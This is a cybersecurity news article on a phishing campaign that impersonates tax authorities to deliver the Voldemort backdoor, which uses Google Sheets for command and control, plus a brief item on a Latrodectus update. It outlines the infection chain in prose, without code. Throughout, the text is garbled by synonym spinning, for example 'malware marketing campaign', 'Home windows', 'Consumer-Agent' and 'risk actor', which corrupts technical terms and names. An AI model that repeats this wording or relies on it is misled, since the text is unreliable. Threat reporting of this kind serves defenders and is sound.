Cybersecurity researchers have uncovered a novel malware marketing campaign that leverages Google Sheets as a command-and-control (C2) mechanism.
The exercise, detected by Proofpoint beginning August 5, 2024, impersonates tax authorities from governments in Europe, Asia, and the U.S., with the objective of concentrating on over 70 organizations worldwide by way of a bespoke software referred to as Voldemort that is outfitted to assemble data and ship extra payloads.
Focused sectors embody insurance coverage, aerospace, transportation, academia, finance, know-how, industrial, healthcare, automotive, hospitality, vitality, authorities, media, manufacturing, telecom, and social profit organizations.
The suspected cyber espionage marketing campaign has not been attributed to a particular named risk actor. As many as 20,000 electronic mail messages have been despatched as a part of the assaults.
These emails declare to be from tax authorities within the U.S., the U.Ok., France, Germany, Italy, India, and Japan, alerting recipients about modifications to their tax filings and urging them to click on on Google AMP Cache URLs that redirect customers to an intermediate touchdown web page.
What the web page does is examine the Consumer-Agent string to find out if the working system is Home windows, and if that’s the case, leverage the search-ms: URI protocol handler to show a Home windows shortcut (LNK) file that makes use of an Adobe Acrobat Reader to masquerade as a PDF file in an try and trick the sufferer into launching it.
“If the LNK is executed, it will invoke PowerShell to run Python.exe from a third WebDAV share on the same tunnel (library), passing a Python script on a fourth share (resource) on the same host as an argument,” Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson mentioned.
“This causes Python to run the script without downloading any files to the computer, with dependencies being loaded directly from the WebDAV share.”
The Python script is designed to assemble system data and ship the information within the type of a Base64-encoded string to an actor-controlled area, after which it exhibits a decoy PDF to the person and downloads a password-protected ZIP file from OpenDrive.
The ZIP archive, for its half, accommodates two information, a legit executable “CiscoCollabHost.exe” that is prone to DLL side-loading and a malicious DLL “CiscoSparkLauncher.dll” (i.e., Voldemort) file that is sideloaded.
Voldemort is a customized backdoor written in C that comes with capabilities for data gathering and loading next-stage payloads, with the malware using Google Sheets for C2, information exfiltration, and executing instructions from the operators.
Proofpoint described the exercise as aligned to superior persistent threats (APT) however carrying “cybercrime vibes” owing to using methods in style within the e-crime panorama.
“Threat actors abuse file schema URIs to access external file sharing resources for malware staging, specifically WebDAV and Server Message Block (SMB). This is done by using the schema ‘file://’ and pointing to a remote server hosting the malicious content,” the researchers mentioned.
This strategy has been more and more prevalent amongst malware households that act as preliminary entry brokers (IABs), resembling Latrodectus, DarkGate, and XWorm.
Moreover, Proofpoint mentioned it was in a position to learn the contents of the Google Sheet, figuring out a complete of six victims, together with one which’s believed to be both a sandbox or a “known researcher.”
The marketing campaign has been branded uncommon, elevating the chance that the risk actors solid a large web earlier than zeroing in on a small pool of targets. It is also doable that the attackers, seemingly with various ranges of technical experience, deliberate to contaminate a number of organizations.
“While many of the campaign characteristics align with cybercriminal threat activity, we assess this is likely espionage activity conducted to support as yet unknown final objectives,” the researchers mentioned.
“The Frankensteinian amalgamation of clever and sophisticated capabilities, paired with very basic techniques and functionality, makes it difficult to assess the level of the threat actor’s capability and determine with high confidence the ultimate goals of the campaign.”
The event comes as Netskope Menace Labs uncovered an up to date model of the Latrodectus (model 1.4) that comes with a brand new C2 endpoint and provides two new backdoor instructions that permit it to obtain shellcode from a specified server and retrieve arbitrary information from a distant location.
“Latrodectus has been evolving pretty fast, adding new features to its payload,” safety researcher Leandro Fróes mentioned. “The understanding of the updates applied to its payload allows defenders to keep automated pipelines properly set as well as use the information for further hunting for new variants.”